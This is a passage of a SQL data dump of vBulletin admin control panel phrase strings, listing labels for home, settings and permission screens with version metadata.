'vBulletin Solutions', 1216812667, '3.8.0 Alpha 1'), (33195, -1, 'software_developed_by', 'cphome', 'Software Developed By', 'vbulletin', '', 0, ''), (33196, -1, 'software_development', 'cphome', 'Software Development', 'vbulletin', '', 0, ''), (33197, -1, 'statistics_and_logs', 'cphome', 'Statistics & Logs', 'vbulletin', '', 0, ''), (33198, -1, 'strip_poll', 'cphome', 'Strip Poll', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33199, -1, 'style_manager', 'cphome', 'Style Manager', 'vbulletin', '', 0, ''), (33200, -1, 'styles_and_templates', 'cphome', 'Styles & Templates', 'vbulletin', '', 0, ''), (33201, -1, 'subscription_manager', 'cphome', 'Subscription Manager', 'vbulletin', '', 0, ''), (33202, -1, 'subscription_permissions', 'cphome', 'Subscription Permissions', 'vbulletin', 'vBulletin Solutions', 1146675021, '3.6.0 Beta 1'), (33203, -1, 'sure_you_want_to_log_out_of_cp', 'cphome', 'Are you sure you want to log out of the control panel?', 'vbulletin', '', 0, ''), (33204, -1, 'test_communication', 'cphome', 'Test Communication', 'vbulletin', '', 0, ''), (33205, -1, 'there_is_a_newer_vbulletin_version', 'cphome', 'There is a newer version of vBulletin available to download', 'vbulletin', '', 0, ''), (33206, -1, 'thread_prefix_manager', 'cphome', 'Thread Prefix Manager', 'vbulletin', 'vBulletin Solutions', 1190044316, '3.7.0 Beta 1'), (33207, -1, 'thread_prefixes', 'cphome', 'Thread Prefixes', 'vbulletin', 'vBulletin Solutions', 1190043795, '3.7.0 Beta 1'), (33208, -1, 'threads_and_posts', 'cphome', 'Threads & Posts', 'vbulletin', '', 0, ''), (33209, -1, 'threads_awaiting_moderation', 'cphome', 'Threads to Moderate', 'vbulletin', '', 0, ''), (33210, -1, 'transaction_log', 'cphome', 'Transaction Log', 'vbulletin', 'vBulletin Solutions', 1147110526, '3.6.0 Beta 1'), (33211, -1, 'transaction_log_and_stats', 'cphome', 'Transaction Log & Stats', 'vbulletin', 'vBulletin Solutions', 1147108253, '3.6.0 Beta 1'), (33212, -1, 'transaction_stats', 'cphome', 'Transaction Stats', 'vbulletin', 'vBulletin Solutions', 1147110532, '3.6.0 Beta 1'), (33213, -1, 'unique_registered_visitors_today', 'cphome', 'Unique Members Today', 'vbulletin', '', 0, ''), (33214, -1, 'update_counters', 'cphome', 'Update Counters', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33215, -1, 'upload_avatar', 'cphome', 'Upload Avatar', 'vbulletin', '', 0, ''), (33216, -1, 'upload_post_icon', 'cphome', 'Upload Post Icon', 'vbulletin', '', 0, ''), (33217, -1, 'upload_smilie', 'cphome', 'Upload Smilie', 'vbulletin', '', 0, ''), (33218, -1, 'useful_links', 'cphome', 'Useful Links', 'vbulletin', '', 0, ''), (33219, -1, 'user_albums', 'cphome', 'User Albums', 'vbulletin', 'vBulletin Solutions', 1192541615, '3.7.0 Beta 1'), (33220, -1, 'user_infraction_level_manager', 'cphome', 'User Infraction Level Manager', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33221, -1, 'user_infraction_manager', 'cphome', 'User Infraction Manager', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33222, -1, 'user_infractions', 'cphome', 'User Infractions', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33223, -1, 'user_profile_field_categories', 'cphome', 'User Profile Field Categories', 'vbulletin', 'vBulletin Solutions', 1176908634, '3.6.6'), (33224, -1, 'user_profile_field_manager', 'cphome', 'User Profile Field Manager', 'vbulletin', '', 0, ''), (33225, -1, 'user_rank_manager', 'cphome', 'User Rank Manager', 'vbulletin', '', 0, ''), (33226, -1, 'user_ranks', 'cphome', 'User Ranks', 'vbulletin', '', 0, ''), (33227, -1, 'user_reputation_manager', 'cphome', 'User Reputation Manager', 'vbulletin', '', 0, ''), (33228, -1, 'user_reputations', 'cphome', 'User Reputations', 'vbulletin', '', 0, ''), (33229, -1, 'user_title_manager', 'cphome', 'User Title Manager', 'vbulletin', '', 0, ''), (33230, -1, 'user_titles', 'cphome', 'User Titles', 'vbulletin', '', 0, ''), (33231, -1, 'usergroup_manager', 'cphome', 'Usergroup Manager', 'vbulletin', '', 0, ''), (33232, -1, 'userpic_storage_type', 'cphome', 'User Picture Storage Type', 'vbulletin', '', 0, ''), (33233, -1, 'users_awaiting_moderation', 'cphome', 'Users to Moderate', 'vbulletin', '', 0, ''), (33234, -1, 'users_online', 'cphome', 'Users Online', 'vbulletin', '', 0, ''), (33235, -1, 'users_online_x_members_y_guests', 'cphome', '{1} Users Online ({2} members and {3} guests)', 'vbulletin', '', 0, ''), (33236, -1, 'vbulletin_developers_and_contributors', 'cphome', 'vBulletin Developers & Contributors', 'vbulletin', '', 0, ''), (33237, -1, 'vbulletin_news_x', 'cphome', 'vBulletin News: {1}', 'vbulletin', 'vBulletin Solutions', 1157465022, '3.6.1'), (33238, -1, 'view_banned_users', 'cphome', 'View Banned Users', 'vbulletin', '', 0, ''), (33239, -1, 'view_infractions', 'cphome', 'View Infractions', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33240, -1, 'view_permissions', 'cphome', 'View Permissions', 'vbulletin', '', 0, ''), (33241, -1, 'view_php_info', 'cphome', 'View PHP Info', 'vbulletin', 'vBulletin Solutions', 1217724234, '3.8.0 Alpha 1'), (33242, -1, 'view_reminders', 'cphome', 'View Reminders', 'vbulletin', '', 0, ''), (33243, -1, 'web_server', 'cphome', 'Web Server', 'vbulletin', '', 0, ''), (33244, -1, 'welcome_to_the_vbulletin_admin_control_panel', 'cphome', 'Welcome to the vBulletin Admin Control Panel', 'vbulletin', '', 0, ''), (33245, -1, 'welcome_to_the_vbulletin_moderator_control_panel', 'cphome', 'Welcome to the vBulletin Moderator Control Panel', 'vbulletin', '', 0, ''), (33246, -1, 'x_y_members_z_guests', 'cphome', '{1} ({2} members and {3} guests)', 'vbulletin', '', 0, ''), (33247, -1, 'you_are_running_vbulletin_version_x', 'cphome', 'You are currently running vBulletin version {1}', 'vbulletin', '', 0, ''), (33248, -1, 'you_have_x_tasks_due', 'cphome', 'You have {1} tasks now due or overdue', 'vbulletin', '', 0, ''), (33249, -1, 'your_version_of_vbulletin_is_up_to_date', 'cphome', 'Your version of vBulletin ({1}) is up-to-date.', 'vbulletin', '', 0, ''), (33250, -1, 'add_new_setting', 'cpoption', 'Add New Setting', 'vbulletin', '', 0, ''), (33251, -1, 'add_new_setting_group', 'cpoption', 'Add New Setting Group', 'vbulletin', '', 0, ''), (33252, -1, 'add_setting', 'cpoption', 'Add Setting', 'vbulletin', '', 0, ''), (33253, -1, 'alignment', 'cpoption', 'Alignment', 'vbulletin', '', 0, ''), (33254, -1, 'are_you_sure_want_to_delete_setting_x', 'cpoption', 'Are you sure you want to delete the setting: \'{1}\'?', 'vbulletin', '', 0, ''), (33255, -1, 'are_you_sure_want_to_delete_settinggroup_x', 'cpoption', 'Are you sure you want to delete the setting group: \'{1}\'?', 'vbulletin', '', 0, ''), (33256, -1, 'backup', 'cpoption', 'Backup', 'vbulletin', 'vBulletin Solutions', 1145051991, '3.6.0 Beta 1'), (33257, -1, 'backup_restore_settings', 'cpoption', 'Backup / Restore Settings', 'vbulletin', 'vBulletin Solutions', 1145043559, '3.6.0 Beta 1'), (33258, -1, 'basic', 'cpoption', 'Basic', 'vbulletin', '', 0, ''), (33259, -1, 'blacklist', 'cpoption', 'Blacklist', 'vbulletin', 'vBulletin Solutions', 1148678112, '3.6.0 Beta 1'), (33260, -1, 'blank', 'cpoption', '(blank)', 'vbulletin', '', 0, ''), (33261, -1, 'collapse_setting_groups', 'cpoption', 'Collapse Setting Groups', 'vbulletin', '', 0, ''), (33262, -1, 'collapsible', 'cpoption', 'Collapsible', 'vbulletin', '', 0, ''), (33263, -1, 'contactus', 'cpoption', 'Contact Us', 'vbulletin', 'vBulletin Solutions', 1216635030, '3.8.0 Alpha 1'), (33264, -1, 'coppa_disabled', 'cpoption', 'Disable COPPA', 'vbulletin', 'vBulletin Solutions', 1144877010, '3.6.0 Beta 1'), (33265, -1, 'coppa_enabled', 'cpoption', 'Enable COPPA', 'vbulletin', 'vBulletin Solutions', 1144877016, '3.6.0 Beta 1'), (33266, -1, 'css', 'cpoption', 'CSS', 'vbulletin', '', 0, ''), (33267, -1, 'custom_setting', 'cpoption', 'Custom Setting', 'vbulletin', '', 0, ''), (33268, -1, 'database_automatic_forum_marking', 'cpoption', 'Database (automatic forum marking)', 'vbulletin', '', 0, ''), (33269, -1, 'database_no_automatic_forum_marking', 'cpoption', 'Database (no automatic forum marking)', 'vbulletin', '', 0, ''), (33270, -1, 'datatype_bitfield', 'cpoption', 'Bitfield', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33271, -1, 'datatype_boolean', 'cpoption', 'Boolean', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33272, -1, 'datatype_free', 'cpoption', 'Free', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33273, -1, 'datatype_integer', 'cpoption', 'Integer', 'vbulletin', 'vBulletin Solutions', 1195215617, '3.7.0 Beta 1'), (33274, -1, 'datatype_numeric', 'cpoption', 'Numeric', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33275, -1, 'datatype_posint', 'cpoption', 'Positive Integer', 'vbulletin', 'vBulletin Solutions', 1208953886, '3.7.0 Release Candidate 4'), (33276, -1, 'datatype_username', 'cpoption', 'Username', 'vbulletin', 'vBulletin Solutions', 1145921395, '3.6.0 Beta 1'), (33277, -1, 'deny_under_13_registration', 'cpoption', 'Deny registration for users aged under 13 years', 'vbulletin', '', 0, ''), (33278, -1, 'detailed', 'cpoption', 'Detailed', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33279, -1, 'detected_gd_version', 'cpoption', 'Detected GD Version', 'vbulletin', '', 0, ''), (33280, -1, 'disable_all_ajax_features', 'cpoption', 'Disable All AJAX Features', 'vbulletin', '', 0, ''), (33281, -1, 'disable_controls', 'cpoption', 'Disable Controls', 'vbulletin', '', 0, ''), (33282, -1, 'disable_problematic_ajax_features', 'cpoption', 'Disable Problematic AJAX Features', 'vbulletin', '', 0, ''), (33283, -1, 'disable_scanning', 'cpoption', 'Disable Scanning', 'vbulletin', 'vBulletin Solutions', 1221045419, '3.8.0 Alpha 1'), (33284, -1, 'display_age', 'cpoption', 'Display Age', 'vbulletin', '', 0, ''), (33285, -1, 'display_but_require_admin_or_mod', 'cpoption', 'Display, but require administrator or moderator', 'vbulletin', '', 0, ''), (33286, -1, 'display_infractions', 'cpoption', 'Display Infractions', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33287, -1, 'display_publicly', 'cpoption', 'Display publicly', 'vbulletin', '', 0, ''), (33288, -1, 'display_reputation_power', 'cpoption', 'Display Reputation Power', 'vbulletin', '', 0, ''), (33289, -1, 'do_not_log_ip', 'cpoption', 'Do not log IP', 'vbulletin', '', 0, ''), (33290, -1, 'download_settings_xml_file', 'cpoption', 'Download Settings XML File', 'vbulletin', '', 0, ''), (33291, -1, 'download_upload_settings', 'cpoption', 'Download / Upload Settings', 'vbulletin', '', 0, ''), (33292, -1, 'edit_settings', 'cpoption', 'Edit Settings', 'vbulletin', '', 0, ''), (33293, -1, 'email_moderators', 'cpoption', 'Email Moderators', 'vbulletin', 'vBulletin Solutions', 1149539350, '3.6.0 Beta 1'), (33294, -1, 'email_moderators_and_administrators', 'cpoption', 'Email Moderators, Super Moderators, and Administrators', 'vbulletin', 'vBulletin Solutions', 1149539380, '3.6.0 Beta 1'), (33295, -1, 'empty_postindex_and_word', 'cpoption', 'Empty postindex and word tables?This can also be done from the Maintenance section later.', 'vbulletin', '', 0, ''), (33296, -1, 'enable_albums', 'cpoption', 'Albums', 'vbulletin', 'vBulletin Solutions', 1194956682, '3.7.0 Beta 1'), (33297, -1, 'enable_all_ajax_features', 'cpoption', 'Enable All AJAX Features', 'vbulletin', '', 0, ''), (33298, -1, 'enable_friends', 'cpoption', 'Friends', 'vbulletin', 'vBulletin Solutions', 1194956699, '3.7.0 Beta 1'), (33299, -1, 'enable_groups', 'cpoption', 'Social Groups', 'vbulletin', 'vBulletin Solutions', 1194956664, '3.7.0 Beta 1'), (33300, -1, 'enable_profile_styling', 'cpoption', 'Profile Styling', 'vbulletin', 'vBulletin Solutions', 1195740393, '3.7.0 Beta 1'), (33301, -1, 'enable_standard_and_wysiwyg_controls', 'cpoption', 'Enable Standard & WYSIWYG Controls ', 'vbulletin', 'vBulletin Solutions', 1161596695, '3.6.3'), (33302, -1, 'enable_standard_controls', 'cpoption', 'Enable Standard Controls', 'vbulletin', '', 0, ''), (33303, -1, 'enable_visitor_tracking', 'cpoption', 'Visitor Tracking', 'vbulletin', 'vBulletin Solutions', 1194956717, '3.7.0 Beta 1'), (33304, -1, 'error_confirmation_phrase', 'cpoption', 'There are errors in the settings on this page.\\n\r\n\\n\r\nAre you sure you want to save the settings?', 'vbulletin', 'vBulletin Solutions', 1149699342, '3.6.0 Beta 1'), (33305, -1, 'expand_setting_groups', 'cpoption', 'Expand Setting Groups', 'vbulletin', '', 0, ''), (33306, -1, 'expanded', 'cpoption', 'Expanded', 'vbulletin', '', 0, ''), (33307, -1, 'full_editor', 'cpoption', 'Full Editor', 'vbulletin', '', 0, ''), (33308, -1, 'gd_simple_font', 'cpoption', 'GD (Simple Font)', 'vbulletin', 'vBulletin Solutions', 1153773989, '3.6.0 Release Candidate 3'), (33309, -1, 'gd_ttf_font', 'cpoption', 'GD (True Type Font)', 'vbulletin', 'vBulletin Solutions', 1153841933, '3.6.0 Release Candidate 3'), (33310, -1, 'group_by_date', 'cpoption', 'Group by Date', 'vbulletin', '', 0, ''), (33311, -1, 'group_by_event', 'cpoption', 'Group by Event', 'vbulletin', '', 0, ''), (33312, -1, 'ignore_blacklisted_settings', 'cpoption', 'Ignore Blacklisted settings', 'vbulletin', 'vBulletin Solutions', 1148683561, '3.6.0 Beta 1'), (33313, -1, 'imagemagick_error', 'cpoption', 'ImageMagick Error', 'vbulletin', '', 0, ''), (33314, -1, 'import_settings_xml_file', 'cpoption', 'Import Settings XML File', 'vbulletin', '', 0, ''), (33315, -1, 'importing_settings', 'cpoption', 'Importing Settings', 'vbulletin', '', 0, ''), (33316, -1, 'inactivity_cookie_based', 'cpoption', 'Inactivity/Cookie Based', 'vbulletin', '', 0, ''), (33317, -1, 'instant_message_icons', 'cpoption', 'Instant Message Icons', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33318, -1, 'language_specific_skypeweb_graphics', 'cpoption', 'Use Language-Specific SkypeWeb Graphics', 'vbulletin', '', 0, ''), (33319, -1, 'links', 'cpoption', 'Links', 'vbulletin', '', 0, ''), (33320, -1, 'live_permission_check', 'cpoption', 'Live Permission Check', 'vbulletin', 'vBulletin Solutions', 1209744605, '3.7.1'), (33321, -1, 'lostpw', 'cpoption', 'Recover Lost Password', 'vbulletin', 'vBulletin Solutions', 1216635171, '3.8.0 Alpha 1'), (33322, -1, 'no_email', 'cpoption', 'No Email', 'vbulletin', 'vBulletin Solutions', 1149539335, '3.6.0 Beta 1'), (33323, -1, 'no_permission_check', 'cpoption', 'No Permission Check', 'vbulletin', 'vBulletin Solutions', 1209744612, '3.7.1'), (33324, -1, 'normal', 'cpoption', 'Normal', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33325, -1, 'not_specified_questions_no_validation', 'cpoption', 'You have not specified any questions. No validation will happen until a question is added.', 'vbulletin', 'vBulletin Solutions', 1197980380, '3.7.0 Beta 3'), (33326, -1, 'only_one_per_post', 'cpoption', 'Yes, if post has only one attachment', 'vbulletin', '', 0, ''), (33327, -1, 'option_code', 'cpoption', 'Option Code (blank, yesno, textarea, or custom eval code)', 'vbulletin', '', 0, ''), (33328, -1, 'qr_click_not_required', 'cpoption', 'Click Not Required', 'vbulletin', '', 0, ''), (33329, -1, 'qr_click_required', 'cpoption', 'Click Required', 'vbulletin', '', 0, ''), (33330, -1, 'question_verification', 'cpoption', 'Question & Answer Verification', 'vbulletin', 'vBulletin Solutions', 1192141474, '3.7.0 Beta 1'), (33331, -1, 'quick_edit', 'cpoption', 'Quick Edit', 'vbulletin', '', 0, ''), (33332, -1, 'quick_reply', 'cpoption', 'Quick Reply', 'vbulletin', '', 0, ''), (33333, -1, 'random_color', 'cpoption', 'Random Color', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33334, -1, 'random_font', 'cpoption', 'Random Font', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33335, -1, 'random_fontsize', 'cpoption', 'Random Font Size', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33336, -1, 'random_shape', 'cpoption', 'Random Shapes', 'vbulletin', 'vBulletin Solutions', 1161208915, '3.6.3'), (33337, -1, 'random_slant', 'cpoption', 'Random Slant', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33338, -1, 'recaptcha', 'cpoption', 'reCAPTCHA™', 'vbulletin', 'vBulletin Solutions', 1205930064, '3.7.0 Release Candidate 1'), (33339, -1, 'recaptcha_blackglass', 'cpoption', 'Black Glass', 'vbulletin', 'vBulletin Solutions', 1192644235, '3.7.0 Beta 1'), (33340, -1, 'recaptcha_clean', 'cpoption', 'Clean', 'vbulletin', 'vBulletin Solutions', 1212065186, '3.7.2'), (33341, -1, 'recaptcha_red', 'cpoption', 'Red', 'vbulletin', 'vBulletin Solutions', 1192644218, '3.7.0 Beta 1'), (33342, -1, 'recaptcha_verification_options', 'cpoption', 'reCAPTCHA™ Verification Options', 'vbulletin', 'vBulletin Solutions', 1205930070, '3.7.0 Release Candidate 1'), (33343, -1, 'recaptcha_white', 'cpoption', 'White', 'vbulletin', 'vBulletin Solutions', 1192644226, '3.7.0 Beta 1'), (33344, -1, 'register', 'cpoption', 'Register', 'vbulletin', 'vBulletin Solutions', 1216635205, '3.8.0 Alpha 1'), (33345, -1, 'remove_fulltext_indices', 'cpoption', 'Remove Fulltext Indexes', 'vbulletin', 'vBulletin Solutions', 1197976790, '3.7.0 Beta 3'), (33346, -1, 'require_birthday', 'cpoption', 'Require Birthday', 'vbulletin', '', 0, ''), (33347, -1, 'restore', 'cpoption', 'Restore', 'vbulletin', 'vBulletin Solutions', 1145051983, '3.6.0 Beta 1'), (33348, -1, 'restore_settings_xml_file', 'cpoption', 'Restore Settings XML File', 'vbulletin', 'vBulletin Solutions', 1145052019, '3.6.0 Beta 1'), (33349, -1, 'restore_xml_file', 'cpoption', 'OR restore the XML file from your server', 'vbulletin', 'vBulletin Solutions', 1145052064, '3.6.0 Beta 1'), (33350, -1, 'save_settings', 'cpoption', 'Save Settings', 'vbulletin', '', 0, ''), (33351, -1, 'setting', 'cpoption', 'Setting', 'vbulletin', '', 0, ''), (33352, -1, 'settings_bitfield_error', 'cpoption', 'An error occurred while processing the bitfield files, the following information was returned: {1}', 'vbulletin', 'vBulletin Solutions', 1157553628, '3.6.1'), (33353, -1, 'show_all_settings', 'cpoption', 'Show All Settings', 'vbulletin', '', 0, ''), (33354, -1, 'show_birthdays_active_users_only', 'cpoption', 'Show birthdays for active users only', 'vbulletin', '', 0, ''), (33355, -1, 'show_total_number_active_members', 'cpoption', 'Show total number of active members', 'vbulletin', '', 0, ''), (33356, -1, 'single', 'cpoption', 'Single', 'vbulletin', '', 0, ''), (33357, -1, 'specify_magick_path_above', 'cpoption', 'Please specify a valid ImageMagick path above.', 'vbulletin', '', 0, ''), (33358, -1, 'suggested_settings', 'cpoption', 'Suggested Settings', 'vbulletin', '', 0, ''), (33359, -1, 'use_custom_setting', 'cpoption', 'Use Custom Setting (Specify Below)', 'vbulletin', '', 0, ''), (33360, -1, 'validation_php_code', 'cpoption', 'Validation PHP Code', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33361, -1, 'yes_alphabetical_all', 'cpoption', 'Yes, Alphabetical listing to all visitors', 'vbulletin', 'vBulletin Solutions', 1145485044, '3.6.0 Beta 1'), (33362, -1, 'yes_alphabetical_members', 'cpoption', 'Yes, Alphabetical listing to members only', 'vbulletin', 'vBulletin Solutions', 1145484984, '3.6.0 Beta 1'), (33363, -1, 'yes_but_disable_moderators', 'cpoption', 'Yes, but Disable Moderators', 'vbulletin', '', 0, ''), (33364, -1, 'yes_but_verify_image', 'cpoption', 'Yes, but Verify Image', 'vbulletin', '', 0, ''), (33365, -1, 'yes_click', 'cpoption', 'Yes, Click', 'vbulletin', 'vBulletin Solutions', 1194968757, '3.7.0 Beta 1'), (33366, -1, 'yes_click_or_hover', 'cpoption', 'Yes, Click or Hover', 'vbulletin', 'vBulletin Solutions', 1199971880, '3.7.0 Beta 4'), (33367, -1, 'yes_display_post_counts', 'cpoption', 'Yes - Display Post Counts', 'vbulletin', '', 0, ''), (33368, -1, 'yes_hide_post_counts', 'cpoption', 'Yes - Hide Post Counts', 'vbulletin', '', 0, ''), (33369, -1, 'yes_hover', 'cpoption', 'Yes, Hover', 'vbulletin', 'vBulletin Solutions', 1194968769, '3.7.0 Beta 1'), (33370, -1, 'yes_plain_text_version', 'cpoption', 'Yes, plain text version', 'vbulletin', 'vBulletin Solutions', 1190112940, '3.7.0 Beta 1'), (33371, -1, 'yes_random_all', 'cpoption', 'Yes, Random listing to all visitors', 'vbulletin', 'vBulletin Solutions', 1145485055, '3.6.0 Beta 1'), (33372, -1, 'yes_random_members', 'cpoption', 'Yes, Random listing to members only', 'vbulletin', 'vBulletin Solutions', 1145485005, '3.6.0 Beta 1'), (33373, -1, 'yes_rich_text_version', 'cpoption', 'Yes, rich text version', 'vbulletin', 'vBulletin Solutions', 1190112947, '3.7.0 Beta 1'), (33374, -1, 'yes_with_border', 'cpoption', 'Yes, with border', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33375, -1, 'yes_with_border_and_dimensions', 'cpoption', 'Yes, with border and dimensions', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33376, -1, 'yes_with_dimensions', 'cpoption', 'Yes, with dimensions', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33377, -1, 'yes_with_locking', 'cpoption', 'Yes, with locking', 'vbulletin', '', 0, ''), (33378, -1, 'yesterday_today', 'cpoption', 'Yesterday / Today', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33379, -1, 'your_forum_is_currently_using_default_search', 'cpoption', 'Your forum is currently using the vBulletin search engine.\r\n

\r\nTo enable the MySQL Fulltext search, we will issue the following two queries. If for some reason this process is unsuccessful, you will need to perform these queries manually. Please be patient as this can take from 10 seconds to an hour depending on the number of posts on your forum.\r\n

\r\nALTER TABLE {1}post ADD FULLTEXT INDEX (title,pagetext)
\r\nALTER TABLE {1}thread ADD FULLTEXT INDEX (title)
\r\n{2}\r\n{3}', 'vbulletin', '', 0, ''), (33380, -1, 'your_forum_is_currently_using_fulltext_search', 'cpoption', 'Your forum is currently using the Fulltext search engine.\r\n

\r\nIf you wish to revert to the vBulletin search engine, please continue. You can leave the Fulltext indexes in place if you expect to return to the Fulltext search in the near future. Leaving them in place will cause added load on your system in the interim.', 'vbulletin', 'vBulletin Solutions', 1197976810, '3.7.0 Beta 3'), (33381, -1, 'your_post_and_thread_table_will_be_converted', 'cpoption', '
Your post and thread table will be converted to the MyISAM type in order to support Fulltext searching.', 'vbulletin', '', 0, ''), (33382, -1, 'additional_functions', 'cppermission', 'Additional Functions', 'vbulletin', '', 0, ''), (33383, -1, 'administrator', 'cppermission', 'Administrator', 'vbulletin', '', 0, ''), (33384, -1, 'administrator_permissions_manager', 'cppermission', 'Administrator Permissions Manager', 'vbulletin', '', 0, ''), (33385, -1, 'album_max_pictures', 'cppermission', 'Maximum Number of Album Pictures', 'vbulletin', 'vBulletin Solutions', 1191938709, '3.7.0 Beta 1'), (33386, -1, 'album_max_size', 'cppermission', 'Maximum Total File Size of Album Pictures (bytes)\r\n1KB = 1024 bytes', 'vbulletin', 'vBulletin Solutions', 1191938732, '3.7.0 Beta 1'), (33387, -1, 'album_picture_max_height', 'cppermission', 'Album Picture Maximum Height (pixels)', 'vbulletin', 'vBulletin Solutions', 1191938644, '3.7.0 Beta 1'), (33388, -1, 'album_picture_max_size', 'cppermission', 'Album Picture Maximum File Size (bytes)\r\n1KB = 1024 bytes', 'vbulletin', 'vBulletin Solutions', 1191938670, '3.7.0 Beta 1'), (33389, -1, 'album_picture_max_width', 'cppermission', 'Album Picture Maximum Width (pixels)', 'vbulletin', 'vBulletin Solutions', 1191938637, '3.7.0 Beta 1'), (33390, -1, 'allow_bbcode_align', 'cppermission', 'Allow Alignment BB Code', 'vbulletin', 'vBulletin Solutions', 1205493460, '3.7.0 Release Candidate 1'), (33391, -1, 'allow_bbcode_basic', 'cppermission', 'Allow Basic BB Code', 'vbulletin', 'vBulletin Solutions', 1205493460, '3.7.0 Release Candidate 1'), (33392, -1, 'allow_bbcode_code', 'cppermission', 'Allow Code BB Code', 'vbulletin', 'vBulletin Solutions', 1205493460, '3.7.0 Release Candidate 1'), (33393, -1, 'allow_bbcode_color', 'cppermission', 'Allow Color BB Code', 'vbulletin', 'vBulletin Solutions', 1205493460, '3.7.0 Release Candidate 1'), (33394, -1, 'allow_bbcode_custom', 'cppermission', 'Allow Custom BB Codes', 'vbulletin', 'vBulletin Solutions', 1203946020, '3.7.0 Beta 6'), (33395, -1, 'allow_bbcode_font', 'cppermission', 'Allow Font BB Code', 'vbulletin', 'vBulletin Solutions', 1205493460, '3.7.0 Release Candidate 1'), (33396, -1, 'allow_bbcode_html', 'cppermission', 'Allow HTML BB Code', 'vbulletin', 'vBulletin Solutions', 1205493460, '3.7.0 Release Candidate 1'), (33397, -1, 'allow_bbcode_img', 'cppermission', 'Allow Image BB Code', 'vbulletin', 'vBulletin Solutions', 1203945993, '3.7.0 Beta 6'), (33398, -1, 'allow_bbcode_link', 'cppermission', 'Allow Link BB Code', 'vbulletin', 'vBulletin Solutions', 1205493460, '3.7.0 Release Candidate 1'), (33399, -1, 'allow_bbcode_list', 'cppermission', 'Allow List BB Code', 'vbulletin', 'vBulletin Solutions', 1205493460, '3.7.0 Release Candidate 1'), (33400, -1, 'allow_bbcode_php', 'cppermission', 'Allow PHP BB Code', 'vbulletin', 'vBulletin Solutions', 1205493460, '3.7.0 Release Candidate 1'), (33401, -1, 'allow_bbcode_quote', 'cppermission', 'Allow Quote BB Code', 'vbulletin', 'vBulletin Solutions', 1205493460, '3.7.0 Release Candidate 1'), (33402, -1, 'allow_bbcode_size', 'cppermission', 'Allow Size BB Code', 'vbulletin', 'vBulletin Solutions', 1205493460, '3.7.0 Release Candidate 1'), (33403, -1, 'allow_member_groups', 'cppermission', 'Allow Users to have Member Groups (Sets whether or not permissions from the user\'s member (secondary) user group memberships are inherited or not)', 'vbulletin', '', 0, ''), (33404, -1, 'apply_permissions_to_forum', 'cppermission', 'Apply Permissions to Forum (Includes Sub-Forums)', 'vbulletin', '', 0, ''), (33405, -1, 'apply_permissions_to_usergroup', 'cppermission', 'Apply Permissions to Usergroups', 'vbulletin', '', 0, ''), (33406, -1, 'attachment_permissions', 'cppermission', 'Attachment Permissions', 'vbulletin', '', 0, ''), (33407, -1, 'birthdays_viewable', 'cppermission', 'Birthdays Viewable (Sets whether or not the birthdays of users in this group are displayed on the calendar and forum home pages)', 'vbulletin', '', 0, ''), (33408, -1, 'calendar_permissions', 'cppermission', 'Calendar Permissions', 'vbulletin', '', 0, ''), (33409, -1, 'calendar_permissions_manager', 'cppermission', 'Calendar Permissions Manager', 'vbulletin', '', 0, ''), (33410, -1, 'can_access_control_panel', 'cppermission', 'Can Access Control Panel (is Administrator)', 'vbulletin', '', 0, ''), (33411, -1, 'can_administer_bbcodes', 'cppermission', 'Can Administer BB Codes', 'vbulletin', '', 0, ''), (33412, -1, 'can_administer_calendars', 'cppermission', 'Can Administer Calendars', 'vbulletin', '', 0, ''), (33413, -1, 'can_administer_cron', 'cppermission', 'Can Administer CRON', 'vbulletin', '', 0, ''), (33414, -1, 'can_administer_faq', 'cppermission', 'Can Administer FAQs', 'vbulletin', '', 0, ''), (33415, -1, 'can_administer_forums', 'cppermission', 'Can Administer Forums', 'vbulletin', '', 0, ''), (33416, -1, 'can_administer_images', 'cppermission', 'Can Administer Avatars / Icons / Smilies', 'vbulletin', '', 0, ''), (33417, -1, 'can_administer_languages', 'cppermission', 'Can Administer Languages', 'vbulletin', '', 0, ''), (33418, -1, 'can_administer_moderator_log', 'cppermission', 'Can Administer Moderator Log', 'vbulletin', 'vBulletin Solutions', 1207570472, '3.7.0 Release Candidate 3'), (33419, -1, 'can_administer_notices', 'cppermission', 'Can Administer Notices', 'vbulletin', 'vBulletin Solutions', 1207568406, '3.7.0 Release Candidate 3'), (33420, -1, 'can_administer_plugins', 'cppermission', 'Can Administer Plugins', 'vbulletin', '', 0, ''), (33421, -1, 'can_administer_settings', 'cppermission', 'Can Administer Settings', 'vbulletin', '', 0, ''), (33422, -1, 'can_administer_styles', 'cppermission', 'Can Administer Styles', 'vbulletin', '', 0, ''), (33423, -1, 'can_administer_threads', 'cppermission', 'Can Administer Threads', 'vbulletin', '', 0, ''), (33424, -1, 'can_administer_user_permissions', 'cppermission', 'Can Administer User Permissions', 'vbulletin', '', 0, ''), (33425, -1, 'can_administer_users', 'cppermission', 'Can Administer Users', 'vbulletin', '', 